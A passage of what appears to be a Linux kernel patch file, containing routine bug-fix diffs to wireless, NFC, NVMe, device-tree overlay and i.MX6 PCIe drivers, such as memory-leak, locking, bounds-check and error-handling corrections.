+ 		status->chain_signal[1] = to_rssi(MT_PRXV_RCPI1, v1);
+@@ -410,17 +431,6 @@ mt7921_mac_fill_rx(struct mt7921_dev *dev, struct sk_buff *skb)
+ 			status->signal = max(status->signal,
+ 					     status->chain_signal[i]);
+ 		}
+-
+-		ret = mt76_connac2_mac_fill_rx_rate(&dev->mt76, status, sband,
+-						    rxv, &mode);
+-		if (ret < 0)
+-			return ret;
+-
+-		if (rxd1 & MT_RXD1_NORMAL_GROUP_5) {
+-			rxd += 18;
+-			if ((u8 *)rxd - skb->data >= skb->len)
+-				return -EINVAL;
+-		}
+ 	}
+ 
+ 	amsdu_info = FIELD_GET(MT_RXD4_NORMAL_PAYLOAD_FORMAT, rxd4);
+@@ -974,7 +984,7 @@ void mt7921_mac_update_mib_stats(struct mt7921_phy *phy)
+ 		mib->tx_amsdu_cnt += val;
+ 	}
+ 
+-	for (i = 0, aggr1 = aggr0 + 4; i < 4; i++) {
++	for (i = 0, aggr1 = aggr0 + 8; i < 4; i++) {
+ 		u32 val2;
+ 
+ 		val = mt76_rr(dev, MT_TX_AGG_CNT(0, i));
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/main.c b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+index 7e409ac7d9a82..111d9221b94f5 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+@@ -1504,7 +1504,13 @@ static int mt7921_set_sar_specs(struct ieee80211_hw *hw,
+ 	int err;
+ 
+ 	mt7921_mutex_acquire(dev);
++	err = mt7921_mcu_set_clc(dev, dev->mt76.alpha2,
++				 dev->country_ie_env);
++	if (err < 0)
++		goto out;
++
+ 	err = mt7921_set_tx_sar_pwr(hw, sar);
++out:
+ 	mt7921_mutex_release(dev);
+ 
+ 	return err;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/mt7921.h b/drivers/net/wireless/mediatek/mt76/mt7921/mt7921.h
+index eaba114a9c7e4..d36b940c0a07a 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/mt7921.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/mt7921.h
+@@ -171,7 +171,7 @@ struct mt7921_clc {
+ 	u8 type;
+ 	u8 rsv[8];
+ 	u8 data[];
+-};
++} __packed;
+ 
+ struct mt7921_phy {
+ 	struct mt76_phy *mt76;
+@@ -244,6 +244,8 @@ struct mt7921_dev {
+ 	struct work_struct ipv6_ns_work;
+ 	/* IPv6 addresses for WoWLAN */
+ 	struct sk_buff_head ipv6_ns_list;
++
++	enum environment_cap country_ie_env;
+ };
+ 
+ enum {
+diff --git a/drivers/net/wireless/mediatek/mt76/usb.c b/drivers/net/wireless/mediatek/mt76/usb.c
+index 4c4033bb1bb35..0597df2729a62 100644
+--- a/drivers/net/wireless/mediatek/mt76/usb.c
++++ b/drivers/net/wireless/mediatek/mt76/usb.c
+@@ -766,6 +766,9 @@ static void mt76u_status_worker(struct mt76_worker *w)
+ 	struct mt76_queue *q;
+ 	int i;
+ 
++	if (!test_bit(MT76_STATE_RUNNING, &dev->phy.state))
++		return;
++
+ 	for (i = 0; i < IEEE80211_NUM_ACS; i++) {
+ 		q = dev->phy.q_tx[i];
+ 		if (!q)
+@@ -785,11 +788,11 @@ static void mt76u_status_worker(struct mt76_worker *w)
+ 			wake_up(&dev->tx_wait);
+ 
+ 		mt76_worker_schedule(&dev->tx_worker);
+-
+-		if (dev->drv->tx_status_data &&
+-		    !test_and_set_bit(MT76_READING_STATS, &dev->phy.state))
+-			queue_work(dev->wq, &dev->usb.stat_work);
+ 	}
++
++	if (dev->drv->tx_status_data &&
++	    !test_and_set_bit(MT76_READING_STATS, &dev->phy.state))
++		queue_work(dev->wq, &dev->usb.stat_work);
+ }
+ 
+ static void mt76u_tx_status_data(struct work_struct *work)
+diff --git a/drivers/net/wireless/purelifi/plfxlc/usb.c b/drivers/net/wireless/purelifi/plfxlc/usb.c
+index 39e54b3787d6a..76d0a778636a4 100644
+--- a/drivers/net/wireless/purelifi/plfxlc/usb.c
++++ b/drivers/net/wireless/purelifi/plfxlc/usb.c
+@@ -247,6 +247,7 @@ error:
+ 		for (i = 0; i < RX_URBS_COUNT; i++)
+ 			free_rx_urb(urbs[i]);
+ 	}
++	kfree(urbs);
+ 	return r;
+ }
+ 
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu.h b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu.h
+index 782b089a2e1ba..1ba66b8f70c95 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu.h
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu.h
+@@ -1190,7 +1190,7 @@ struct rtl8723bu_c2h {
+ 			u8 bw;
+ 		} __packed ra_report;
+ 	};
+-};
++} __packed;
+ 
+ struct rtl8xxxu_fileops;
+ 
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+index ac641a56efb09..e9c1b62c9c3c2 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+@@ -1608,18 +1608,18 @@ static int rtl8xxxu_identify_chip(struct rtl8xxxu_priv *priv)
+ {
+ 	struct device *dev = &priv->udev->dev;
+ 	struct ieee80211_hw *hw = priv->hw;
+-	u32 val32, bonding;
++	u32 val32, bonding, sys_cfg;
+ 	u16 val16;
+ 
+-	val32 = rtl8xxxu_read32(priv, REG_SYS_CFG);
+-	priv->chip_cut = (val32 & SYS_CFG_CHIP_VERSION_MASK) >>
++	sys_cfg = rtl8xxxu_read32(priv, REG_SYS_CFG);
++	priv->chip_cut = (sys_cfg & SYS_CFG_CHIP_VERSION_MASK) >>
+ 		SYS_CFG_CHIP_VERSION_SHIFT;
+-	if (val32 & SYS_CFG_TRP_VAUX_EN) {
++	if (sys_cfg & SYS_CFG_TRP_VAUX_EN) {
+ 		dev_info(dev, "Unsupported test chip\n");
+ 		return -ENOTSUPP;
+ 	}
+ 
+-	if (val32 & SYS_CFG_BT_FUNC) {
++	if (sys_cfg & SYS_CFG_BT_FUNC) {
+ 		if (priv->chip_cut >= 3) {
+ 			sprintf(priv->chip_name, "8723BU");
+ 			priv->rtl_chip = RTL8723B;
+@@ -1641,7 +1641,7 @@ static int rtl8xxxu_identify_chip(struct rtl8xxxu_priv *priv)
+ 		if (val32 & MULTI_GPS_FUNC_EN)
+ 			priv->has_gps = 1;
+ 		priv->is_multi_func = 1;
+-	} else if (val32 & SYS_CFG_TYPE_ID) {
++	} else if (sys_cfg & SYS_CFG_TYPE_ID) {
+ 		bonding = rtl8xxxu_read32(priv, REG_HPON_FSM);
+ 		bonding &= HPON_FSM_BONDING_MASK;
+ 		if (priv->fops->tx_desc_size ==
+@@ -1692,7 +1692,7 @@ static int rtl8xxxu_identify_chip(struct rtl8xxxu_priv *priv)
+ 	case RTL8188E:
+ 	case RTL8192E:
+ 	case RTL8723B:
+-		switch (val32 & SYS_CFG_VENDOR_EXT_MASK) {
++		switch (sys_cfg & SYS_CFG_VENDOR_EXT_MASK) {
+ 		case SYS_CFG_VENDOR_ID_TSMC:
+ 			sprintf(priv->chip_vendor, "TSMC");
+ 			break;
+@@ -1709,7 +1709,7 @@ static int rtl8xxxu_identify_chip(struct rtl8xxxu_priv *priv)
+ 		}
+ 		break;
+ 	default:
+-		if (val32 & SYS_CFG_VENDOR_ID) {
++		if (sys_cfg & SYS_CFG_VENDOR_ID) {
+ 			sprintf(priv->chip_vendor, "UMC");
+ 			priv->vendor_umc = 1;
+ 		} else {
+@@ -4654,7 +4654,6 @@ rtl8xxxu_bss_info_changed(struct ieee80211_hw *hw, struct ieee80211_vif *vif,
+ 			if (sta->deflink.ht_cap.cap &
+ 			    (IEEE80211_HT_CAP_SGI_40 | IEEE80211_HT_CAP_SGI_20))
+ 				sgi = 1;
+-			rcu_read_unlock();
+ 
+ 			highest_rate = fls(ramask) - 1;
+ 			if (highest_rate < DESC_RATE_MCS0) {
+@@ -4679,6 +4678,7 @@ rtl8xxxu_bss_info_changed(struct ieee80211_hw *hw, struct ieee80211_vif *vif,
+ 				else
+ 					rarpt->txrate.bw = RATE_INFO_BW_20;
+ 			}
++			rcu_read_unlock();
+ 			bit_rate = cfg80211_calculate_bitrate(&rarpt->txrate);
+ 			rarpt->bit_rate = bit_rate;
+ 			rarpt->desc_rate = highest_rate;
+@@ -5574,7 +5574,6 @@ static void rtl8xxxu_c2hcmd_callback(struct work_struct *work)
+ 			rarpt->txrate.flags = 0;
+ 			rate = c2h->ra_report.rate;
+ 			sgi = c2h->ra_report.sgi;
+-			bw = c2h->ra_report.bw;
+ 
+ 			if (rate < DESC_RATE_MCS0) {
+ 				rarpt->txrate.legacy =
+@@ -5591,8 +5590,13 @@ static void rtl8xxxu_c2hcmd_callback(struct work_struct *work)
+ 						RATE_INFO_FLAGS_SHORT_GI;
+ 				}
+ 
+-				if (bw == RATE_INFO_BW_20)
+-					rarpt->txrate.bw |= RATE_INFO_BW_20;
++				if (skb->len >= offsetofend(typeof(*c2h), ra_report.bw)) {
++					if (c2h->ra_report.bw == RTL8XXXU_CHANNEL_WIDTH_40)
++						bw = RATE_INFO_BW_40;
++					else
++						bw = RATE_INFO_BW_20;
++					rarpt->txrate.bw = bw;
++				}
+ 			}
+ 			bit_rate = cfg80211_calculate_bitrate(&rarpt->txrate);
+ 			rarpt->bit_rate = bit_rate;
+diff --git a/drivers/net/wireless/realtek/rtw89/core.c b/drivers/net/wireless/realtek/rtw89/core.c
+index bc2994865372b..ad420d7ec8af9 100644
+--- a/drivers/net/wireless/realtek/rtw89/core.c
++++ b/drivers/net/wireless/realtek/rtw89/core.c
+@@ -2527,7 +2527,7 @@ int rtw89_core_sta_assoc(struct rtw89_dev *rtwdev,
+ 	}
+ 
+ 	/* update cam aid mac_id net_type */
+-	rtw89_fw_h2c_cam(rtwdev, rtwvif, rtwsta, NULL);
++	ret = rtw89_fw_h2c_cam(rtwdev, rtwvif, rtwsta, NULL);
+ 	if (ret) {
+ 		rtw89_warn(rtwdev, "failed to send h2c cam\n");
+ 		return ret;
+diff --git a/drivers/net/wireless/realtek/rtw89/mac.c b/drivers/net/wireless/realtek/rtw89/mac.c
+index 0508dfca8edf7..077fddc5fa1ea 100644
+--- a/drivers/net/wireless/realtek/rtw89/mac.c
++++ b/drivers/net/wireless/realtek/rtw89/mac.c
+@@ -1429,10 +1429,8 @@ static int dle_mix_cfg(struct rtw89_dev *rtwdev, const struct rtw89_dle_mem *cfg
+ #define INVALID_QT_WCPU U16_MAX
+ #define SET_QUOTA_VAL(_min_x, _max_x, _module, _idx)			\
+ 	do {								\
+-		val = ((_min_x) &					\
+-		       B_AX_ ## _module ## _MIN_SIZE_MASK) |		\
+-		      (((_max_x) << 16) &				\
+-		       B_AX_ ## _module ## _MAX_SIZE_MASK);		\
++		val = u32_encode_bits(_min_x, B_AX_ ## _module ## _MIN_SIZE_MASK) | \
++		      u32_encode_bits(_max_x, B_AX_ ## _module ## _MAX_SIZE_MASK);  \
+ 		rtw89_write32(rtwdev,					\
+ 			      R_AX_ ## _module ## _QTA ## _idx ## _CFG,	\
+ 			      val);					\
+diff --git a/drivers/net/wireless/realtek/rtw89/phy.c b/drivers/net/wireless/realtek/rtw89/phy.c
+index 6a6bdc652e09e..c894a2b614eb1 100644
+--- a/drivers/net/wireless/realtek/rtw89/phy.c
++++ b/drivers/net/wireless/realtek/rtw89/phy.c
+@@ -3139,7 +3139,7 @@ void rtw89_phy_env_monitor_track(struct rtw89_dev *rtwdev)
+ 
+ static bool rtw89_physts_ie_page_valid(enum rtw89_phy_status_bitmap *ie_page)
+ {
+-	if (*ie_page > RTW89_PHYSTS_BITMAP_NUM ||
++	if (*ie_page >= RTW89_PHYSTS_BITMAP_NUM ||
+ 	    *ie_page == RTW89_RSVD_9)
+ 		return false;
+ 	else if (*ie_page > RTW89_RSVD_9)
+diff --git a/drivers/net/wireless/rsi/rsi_91x_core.c b/drivers/net/wireless/rsi/rsi_91x_core.c
+index 0f3a80f66b61c..ead4d4e043280 100644
+--- a/drivers/net/wireless/rsi/rsi_91x_core.c
++++ b/drivers/net/wireless/rsi/rsi_91x_core.c
+@@ -466,7 +466,9 @@ void rsi_core_xmit(struct rsi_common *common, struct sk_buff *skb)
+ 							      tid, 0);
+ 			}
+ 		}
+-		if (skb->protocol == cpu_to_be16(ETH_P_PAE)) {
++
++		if (IEEE80211_SKB_CB(skb)->control.flags &
++		    IEEE80211_TX_CTRL_PORT_CTRL_PROTO) {
+ 			q_num = MGMT_SOFT_Q;
+ 			skb->priority = q_num;
+ 		}
+diff --git a/drivers/net/wireless/rsi/rsi_91x_hal.c b/drivers/net/wireless/rsi/rsi_91x_hal.c
+index c61f83a7333b6..c7460fbba0142 100644
+--- a/drivers/net/wireless/rsi/rsi_91x_hal.c
++++ b/drivers/net/wireless/rsi/rsi_91x_hal.c
+@@ -162,12 +162,16 @@ int rsi_prepare_data_desc(struct rsi_common *common, struct sk_buff *skb)
+ 	u8 header_size;
+ 	u8 vap_id = 0;
+ 	u8 dword_align_bytes;
++	bool tx_eapol;
+ 	u16 seq_num;
+ 
+ 	info = IEEE80211_SKB_CB(skb);
+ 	vif = info->control.vif;
+ 	tx_params = (struct skb_info *)info->driver_data;
+ 
++	tx_eapol = IEEE80211_SKB_CB(skb)->control.flags &
++		   IEEE80211_TX_CTRL_PORT_CTRL_PROTO;
++
+ 	header_size = FRAME_DESC_SZ + sizeof(struct rsi_xtended_desc);
+ 	if (header_size > skb_headroom(skb)) {
+ 		rsi_dbg(ERR_ZONE, "%s: Unable to send pkt\n", __func__);
+@@ -231,7 +235,7 @@ int rsi_prepare_data_desc(struct rsi_common *common, struct sk_buff *skb)
+ 		}
+ 	}
+ 
+-	if (skb->protocol == cpu_to_be16(ETH_P_PAE)) {
++	if (tx_eapol) {
+ 		rsi_dbg(INFO_ZONE, "*** Tx EAPOL ***\n");
+ 
+ 		data_desc->frame_info = cpu_to_le16(RATE_INFO_ENABLE);
+diff --git a/drivers/nfc/pn533/pn533.c b/drivers/nfc/pn533/pn533.c
+index d9f6367b9993d..f0cac19005527 100644
+--- a/drivers/nfc/pn533/pn533.c
++++ b/drivers/nfc/pn533/pn533.c
+@@ -1295,6 +1295,8 @@ static int pn533_poll_dep_complete(struct pn533 *dev, void *arg,
+ 	if (IS_ERR(resp))
+ 		return PTR_ERR(resp);
+ 
++	memset(&nfc_target, 0, sizeof(struct nfc_target));
++
+ 	rsp = (struct pn533_cmd_jump_dep_response *)resp->data;
+ 
+ 	rc = rsp->status & PN533_CMD_RET_MASK;
+@@ -1926,6 +1928,8 @@ static int pn533_in_dep_link_up_complete(struct pn533 *dev, void *arg,
+ 
+ 		dev_dbg(dev->dev, "Creating new target\n");
+ 
++		memset(&nfc_target, 0, sizeof(struct nfc_target));
++
+ 		nfc_target.supported_protocols = NFC_PROTO_NFC_DEP_MASK;
+ 		nfc_target.nfcid1_len = 10;
+ 		memcpy(nfc_target.nfcid1, rsp->nfcid3t, nfc_target.nfcid1_len);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 7e3893d06babd..108b5022ceadc 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -3049,7 +3049,7 @@ static int nvme_init_non_mdts_limits(struct nvme_ctrl *ctrl)
+ 
+ 	id = kzalloc(sizeof(*id), GFP_KERNEL);
+ 	if (!id)
+-		return 0;
++		return -ENOMEM;
+ 
+ 	c.identify.opcode = nvme_admin_identify;
+ 	c.identify.cns = NVME_ID_CNS_CS_CTRL;
+@@ -3745,13 +3745,17 @@ static ssize_t nvme_ctrl_dhchap_secret_store(struct device *dev,
+ 	memcpy(dhchap_secret, buf, count);
+ 	nvme_auth_stop(ctrl);
+ 	if (strcmp(dhchap_secret, opts->dhchap_secret)) {
++		struct nvme_dhchap_key *key, *host_key;
+ 		int ret;
+ 
+-		ret = nvme_auth_generate_key(dhchap_secret, &ctrl->host_key);
++		ret = nvme_auth_generate_key(dhchap_secret, &key);
+ 		if (ret)
+ 			return ret;
+ 		kfree(opts->dhchap_secret);
+ 		opts->dhchap_secret = dhchap_secret;
++		host_key = ctrl->host_key;
++		ctrl->host_key = key;
++		nvme_auth_free_key(host_key);
+ 		/* Key has changed; re-authentication with new key */
+ 		nvme_auth_reset(ctrl);
+ 	}
+@@ -3795,13 +3799,17 @@ static ssize_t nvme_ctrl_dhchap_ctrl_secret_store(struct device *dev,
+ 	memcpy(dhchap_secret, buf, count);
+ 	nvme_auth_stop(ctrl);
+ 	if (strcmp(dhchap_secret, opts->dhchap_ctrl_secret)) {
++		struct nvme_dhchap_key *key, *ctrl_key;
+ 		int ret;
+ 
+-		ret = nvme_auth_generate_key(dhchap_secret, &ctrl->ctrl_key);
++		ret = nvme_auth_generate_key(dhchap_secret, &key);
+ 		if (ret)
+ 			return ret;
+ 		kfree(opts->dhchap_ctrl_secret);
+ 		opts->dhchap_ctrl_secret = dhchap_secret;
++		ctrl_key = ctrl->ctrl_key;
++		ctrl->ctrl_key = key;
++		nvme_auth_free_key(ctrl_key);
+ 		/* Key has changed; re-authentication with new key */
+ 		nvme_auth_reset(ctrl);
+ 	}
+@@ -4867,7 +4875,7 @@ EXPORT_SYMBOL_GPL(nvme_remove_admin_tag_set);
+ 
+ int nvme_alloc_io_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+ 		const struct blk_mq_ops *ops, unsigned int flags,
+-		unsigned int cmd_size)
++		unsigned int nr_maps, unsigned int cmd_size)
+ {
+ 	int ret;
+ 
+@@ -4881,8 +4889,7 @@ int nvme_alloc_io_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+ 	set->driver_data = ctrl;
+ 	set->nr_hw_queues = ctrl->queue_count - 1;
+ 	set->timeout = NVME_IO_TIMEOUT;
+-	if (ops->map_queues)
+-		set->nr_maps = ctrl->opts->nr_poll_queues ? HCTX_MAX_TYPES : 2;
++	set->nr_maps = nr_maps;
+ 	ret = blk_mq_alloc_tag_set(set);
+ 	if (ret)
+ 		return ret;
+diff --git a/drivers/nvme/host/fc.c b/drivers/nvme/host/fc.c
+index 5d57a042dbcad..20b0c29a9a341 100644
+--- a/drivers/nvme/host/fc.c
++++ b/drivers/nvme/host/fc.c
+@@ -2903,7 +2903,7 @@ nvme_fc_create_io_queues(struct nvme_fc_ctrl *ctrl)
+ 	nvme_fc_init_io_queues(ctrl);
+ 
+ 	ret = nvme_alloc_io_tag_set(&ctrl->ctrl, &ctrl->tag_set,
+-			&nvme_fc_mq_ops, BLK_MQ_F_SHOULD_MERGE,
++			&nvme_fc_mq_ops, BLK_MQ_F_SHOULD_MERGE, 1,
+ 			struct_size((struct nvme_fcp_op_w_sgl *)NULL, priv,
+ 				    ctrl->lport->ops->fcprqst_priv_sz));
+ 	if (ret)
+diff --git a/drivers/nvme/host/nvme.h b/drivers/nvme/host/nvme.h
+index a29877217ee65..8a0db9e06dc65 100644
+--- a/drivers/nvme/host/nvme.h
++++ b/drivers/nvme/host/nvme.h
+@@ -743,7 +743,7 @@ int nvme_alloc_admin_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+ void nvme_remove_admin_tag_set(struct nvme_ctrl *ctrl);
+ int nvme_alloc_io_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+ 		const struct blk_mq_ops *ops, unsigned int flags,
+-		unsigned int cmd_size);
++		unsigned int nr_maps, unsigned int cmd_size);
+ void nvme_remove_io_tag_set(struct nvme_ctrl *ctrl);
+ 
+ void nvme_remove_namespaces(struct nvme_ctrl *ctrl);
+diff --git a/drivers/nvme/host/rdma.c b/drivers/nvme/host/rdma.c
+index 6e079abb22ee9..a55d3e8b607d5 100644
+--- a/drivers/nvme/host/rdma.c
++++ b/drivers/nvme/host/rdma.c
+@@ -798,7 +798,9 @@ static int nvme_rdma_alloc_tag_set(struct nvme_ctrl *ctrl)
+ 			    NVME_RDMA_METADATA_SGL_SIZE;
+ 
+ 	return nvme_alloc_io_tag_set(ctrl, &to_rdma_ctrl(ctrl)->tag_set,
+-			&nvme_rdma_mq_ops, BLK_MQ_F_SHOULD_MERGE, cmd_size);
++			&nvme_rdma_mq_ops, BLK_MQ_F_SHOULD_MERGE,
++			ctrl->opts->nr_poll_queues ? HCTX_MAX_TYPES : 2,
++			cmd_size);
+ }
+ 
+ static void nvme_rdma_destroy_admin_queue(struct nvme_rdma_ctrl *ctrl)
+diff --git a/drivers/nvme/host/tcp.c b/drivers/nvme/host/tcp.c
+index 9b47dcb2a7d97..83735c52d34a0 100644
+--- a/drivers/nvme/host/tcp.c
++++ b/drivers/nvme/host/tcp.c
+@@ -1868,6 +1868,7 @@ static int nvme_tcp_configure_io_queues(struct nvme_ctrl *ctrl, bool new)
+ 		ret = nvme_alloc_io_tag_set(ctrl, &to_tcp_ctrl(ctrl)->tag_set,
+ 				&nvme_tcp_mq_ops,
+ 				BLK_MQ_F_SHOULD_MERGE | BLK_MQ_F_BLOCKING,
++				ctrl->opts->nr_poll_queues ? HCTX_MAX_TYPES : 2,
+ 				sizeof(struct nvme_tcp_request));
+ 		if (ret)
+ 			goto out_free_io_queues;
+diff --git a/drivers/nvme/target/core.c b/drivers/nvme/target/core.c
+index aecb5853f8da4..683b75a992b3d 100644
+--- a/drivers/nvme/target/core.c
++++ b/drivers/nvme/target/core.c
+@@ -15,6 +15,7 @@
+ 
+ #include "nvmet.h"
+ 
++struct kmem_cache *nvmet_bvec_cache;
+ struct workqueue_struct *buffered_io_wq;
+ struct workqueue_struct *zbd_wq;
+ static const struct nvmet_fabrics_ops *nvmet_transports[NVMF_TRTYPE_MAX];
+@@ -1631,26 +1632,28 @@ void nvmet_subsys_put(struct nvmet_subsys *subsys)
+ 
+ static int __init nvmet_init(void)
+ {
+-	int error;
++	int error = -ENOMEM;
+ 
+ 	nvmet_ana_group_enabled[NVMET_DEFAULT_ANA_GRPID] = 1;
+ 
++	nvmet_bvec_cache = kmem_cache_create("nvmet-bvec",
++			NVMET_MAX_MPOOL_BVEC * sizeof(struct bio_vec), 0,
++			SLAB_HWCACHE_ALIGN, NULL);
++	if (!nvmet_bvec_cache)
++		return -ENOMEM;
++
+ 	zbd_wq = alloc_workqueue("nvmet-zbd-wq", WQ_MEM_RECLAIM, 0);
+ 	if (!zbd_wq)
+-		return -ENOMEM;
++		goto out_destroy_bvec_cache;
+ 
+ 	buffered_io_wq = alloc_workqueue("nvmet-buffered-io-wq",
+ 			WQ_MEM_RECLAIM, 0);
+-	if (!buffered_io_wq) {
+-		error = -ENOMEM;
++	if (!buffered_io_wq)
+ 		goto out_free_zbd_work_queue;
+-	}
+ 
+ 	nvmet_wq = alloc_workqueue("nvmet-wq", WQ_MEM_RECLAIM, 0);
+-	if (!nvmet_wq) {
+-		error = -ENOMEM;
++	if (!nvmet_wq)
+ 		goto out_free_buffered_work_queue;
+-	}
+ 
+ 	error = nvmet_init_discovery();
+ 	if (error)
+@@ -1669,6 +1672,8 @@ out_free_buffered_work_queue:
+ 	destroy_workqueue(buffered_io_wq);
+ out_free_zbd_work_queue:
+ 	destroy_workqueue(zbd_wq);
++out_destroy_bvec_cache:
++	kmem_cache_destroy(nvmet_bvec_cache);
+ 	return error;
+ }
+ 
+@@ -1680,6 +1685,7 @@ static void __exit nvmet_exit(void)
+ 	destroy_workqueue(nvmet_wq);
+ 	destroy_workqueue(buffered_io_wq);
+ 	destroy_workqueue(zbd_wq);
++	kmem_cache_destroy(nvmet_bvec_cache);
+ 
+ 	BUILD_BUG_ON(sizeof(struct nvmf_disc_rsp_page_entry) != 1024);
+ 	BUILD_BUG_ON(sizeof(struct nvmf_disc_rsp_page_hdr) != 1024);
+diff --git a/drivers/nvme/target/io-cmd-file.c b/drivers/nvme/target/io-cmd-file.c
+index 64b47e2a46330..e55ec6fefd7f4 100644
+--- a/drivers/nvme/target/io-cmd-file.c
++++ b/drivers/nvme/target/io-cmd-file.c
+@@ -11,7 +11,6 @@
+ #include <linux/fs.h>
+ #include "nvmet.h"
+ 
+-#define NVMET_MAX_MPOOL_BVEC		16
+ #define NVMET_MIN_MPOOL_OBJ		16
+ 
+ void nvmet_file_ns_revalidate(struct nvmet_ns *ns)
+@@ -26,8 +25,6 @@ void nvmet_file_ns_disable(struct nvmet_ns *ns)
+ 			flush_workqueue(buffered_io_wq);
+ 		mempool_destroy(ns->bvec_pool);
+ 		ns->bvec_pool = NULL;
+-		kmem_cache_destroy(ns->bvec_cache);
+-		ns->bvec_cache = NULL;
+ 		fput(ns->file);
+ 		ns->file = NULL;
+ 	}
+@@ -59,16 +56,8 @@ int nvmet_file_ns_enable(struct nvmet_ns *ns)
+ 	ns->blksize_shift = min_t(u8,
+ 			file_inode(ns->file)->i_blkbits, 12);
+ 
+-	ns->bvec_cache = kmem_cache_create("nvmet-bvec",
+-			NVMET_MAX_MPOOL_BVEC * sizeof(struct bio_vec),
+-			0, SLAB_HWCACHE_ALIGN, NULL);
+-	if (!ns->bvec_cache) {
+-		ret = -ENOMEM;
+-		goto err;
+-	}
+-
+ 	ns->bvec_pool = mempool_create(NVMET_MIN_MPOOL_OBJ, mempool_alloc_slab,
+-			mempool_free_slab, ns->bvec_cache);
++			mempool_free_slab, nvmet_bvec_cache);
+ 
+ 	if (!ns->bvec_pool) {
+ 		ret = -ENOMEM;
+@@ -77,9 +66,10 @@ int nvmet_file_ns_enable(struct nvmet_ns *ns)
+ 
+ 	return ret;
+ err:
++	fput(ns->file);
++	ns->file = NULL;
+ 	ns->size = 0;
+ 	ns->blksize_shift = 0;
+-	nvmet_file_ns_disable(ns);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/nvme/target/loop.c b/drivers/nvme/target/loop.c
+index b45fe3adf015f..08c583258e90f 100644
+--- a/drivers/nvme/target/loop.c
++++ b/drivers/nvme/target/loop.c
+@@ -494,7 +494,7 @@ static int nvme_loop_create_io_queues(struct nvme_loop_ctrl *ctrl)
+ 		return ret;
+ 
+ 	ret = nvme_alloc_io_tag_set(&ctrl->ctrl, &ctrl->tag_set,
+-			&nvme_loop_mq_ops, BLK_MQ_F_SHOULD_MERGE,
++			&nvme_loop_mq_ops, BLK_MQ_F_SHOULD_MERGE, 1,
+ 			sizeof(struct nvme_loop_iod) +
+ 			NVME_INLINE_SG_CNT * sizeof(struct scatterlist));
+ 	if (ret)
+diff --git a/drivers/nvme/target/nvmet.h b/drivers/nvme/target/nvmet.h
+index dfe3894205aa7..bda1c1f71f394 100644
+--- a/drivers/nvme/target/nvmet.h
++++ b/drivers/nvme/target/nvmet.h
+@@ -77,7 +77,6 @@ struct nvmet_ns {
+ 
+ 	struct completion	disable_done;
+ 	mempool_t		*bvec_pool;
+-	struct kmem_cache	*bvec_cache;
+ 
+ 	int			use_p2pmem;
+ 	struct pci_dev		*p2p_dev;
+@@ -393,6 +392,8 @@ struct nvmet_req {
+ 	u64			error_slba;
+ };
+ 
++#define NVMET_MAX_MPOOL_BVEC		16
++extern struct kmem_cache *nvmet_bvec_cache;
+ extern struct workqueue_struct *buffered_io_wq;
+ extern struct workqueue_struct *zbd_wq;
+ extern struct workqueue_struct *nvmet_wq;
+diff --git a/drivers/of/overlay.c b/drivers/of/overlay.c
+index bd8ff4df723da..ed4e6c144a681 100644
+--- a/drivers/of/overlay.c
++++ b/drivers/of/overlay.c
+@@ -545,7 +545,7 @@ static int find_dup_cset_node_entry(struct overlay_changeset *ovcs,
+ 
+ 		fn_1 = kasprintf(GFP_KERNEL, "%pOF", ce_1->np);
+ 		fn_2 = kasprintf(GFP_KERNEL, "%pOF", ce_2->np);
+-		node_path_match = !strcmp(fn_1, fn_2);
++		node_path_match = !fn_1 || !fn_2 || !strcmp(fn_1, fn_2);
+ 		kfree(fn_1);
+ 		kfree(fn_2);
+ 		if (node_path_match) {
+@@ -580,7 +580,7 @@ static int find_dup_cset_prop(struct overlay_changeset *ovcs,
+ 
+ 		fn_1 = kasprintf(GFP_KERNEL, "%pOF", ce_1->np);
+ 		fn_2 = kasprintf(GFP_KERNEL, "%pOF", ce_2->np);
+-		node_path_match = !strcmp(fn_1, fn_2);
++		node_path_match = !fn_1 || !fn_2 || !strcmp(fn_1, fn_2);
+ 		kfree(fn_1);
+ 		kfree(fn_2);
+ 		if (node_path_match &&
+diff --git a/drivers/pci/controller/dwc/pci-imx6.c b/drivers/pci/controller/dwc/pci-imx6.c
+index 2616585ca5f8a..1dde5c579edc8 100644
+--- a/drivers/pci/controller/dwc/pci-imx6.c
++++ b/drivers/pci/controller/dwc/pci-imx6.c
+@@ -952,12 +952,6 @@ static int imx6_pcie_host_init(struct dw_pcie_rp *pp)
+ 		}
+ 	}
+ 
+-	ret = imx6_pcie_deassert_core_reset(imx6_pcie);
+-	if (ret < 0) {
+-		dev_err(dev, "pcie deassert core reset failed: %d\n", ret);
+-		goto err_phy_off;
+-	}
+-
+ 	if (imx6_pcie->phy) {
+ 		ret = phy_power_on(imx6_pcie->phy);
+ 		if (ret) {
+@@ -965,6 +959,13 @@ static int imx6_pcie_host_init(struct dw_pcie_rp *pp)
+ 			goto err_phy_off;
+ 		}
+ 	}
++
++	ret = imx6_pcie_deassert_core_reset(imx6_pcie);
++	if (ret < 0) {
++		dev_err(dev, "pcie deassert core reset failed: %d\n", ret);
++		goto err_phy_off;
++	}
++
+ 	imx6_setup_phy_mpll(imx6_pcie);
+ 
+ 	return 0;
